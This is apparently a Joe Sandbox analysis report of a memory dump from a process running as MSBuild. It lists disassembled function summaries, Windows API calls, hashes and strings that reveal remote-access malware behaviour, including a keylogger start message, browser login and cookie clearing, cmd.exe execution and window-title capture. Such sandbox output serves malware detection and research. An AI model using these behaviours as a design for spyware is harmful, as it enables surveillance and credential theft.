                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                • API String ID: 1497725170-1359877963
                                                                                                • Opcode ID: 0c29132a8f5ff73610e7b1771e8d339d9c6428c12f3068cfd882d0431d65c492
                                                                                                • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                • Opcode Fuzzy Hash: 0c29132a8f5ff73610e7b1771e8d339d9c6428c12f3068cfd882d0431d65c492
                                                                                                • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: ee3a13647202a8f1304717967fce395e506a5973f81be1ac5120480b783b0218
                                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                • Opcode Fuzzy Hash: ee3a13647202a8f1304717967fce395e506a5973f81be1ac5120480b783b0218
                                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                • String ID: `@
                                                                                                • API String ID: 2583163307-951712118
                                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: 99978ec5683d6a671997bd421d48c57d1878bc22c47c404c8c0f0353ff203f3a
                                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                • Opcode Fuzzy Hash: 99978ec5683d6a671997bd421d48c57d1878bc22c47c404c8c0f0353ff203f3a
                                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3628047217-1405518554
                                                                                                • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                • Opcode Fuzzy Hash: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
                                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                                                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                APIs
                                                                                                Strings
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
                                                                                                • Opcode ID: ee9975bb4fc7a508db10e208e0640185d2dc580a4541f2e369227bad9fcc3aa7
                                                                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                • Opcode Fuzzy Hash: ee9975bb4fc7a508db10e208e0640185d2dc580a4541f2e369227bad9fcc3aa7
                                                                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                APIs
                                                                                                  • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                  • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                  • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID: @CG$exepath$BG
                                                                                                • API String ID: 4119054056-3221201242
                                                                                                • Opcode ID: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                • Opcode Fuzzy Hash: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 737400349-0
                                                                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-0
                                                                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 39102293-0
                                                                                                • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Info
                                                                                                • String ID: $fD
                                                                                                • API String ID: 1807457897-3092946448
                                                                                                • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-1507639952
                                                                                                • Opcode ID: 57c6993648cd52224a235ccf7e01bb82a324f43e49f6b075d869ea7f96f750db
                                                                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                                • Opcode Fuzzy Hash: 57c6993648cd52224a235ccf7e01bb82a324f43e49f6b075d869ea7f96f750db
                                                                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
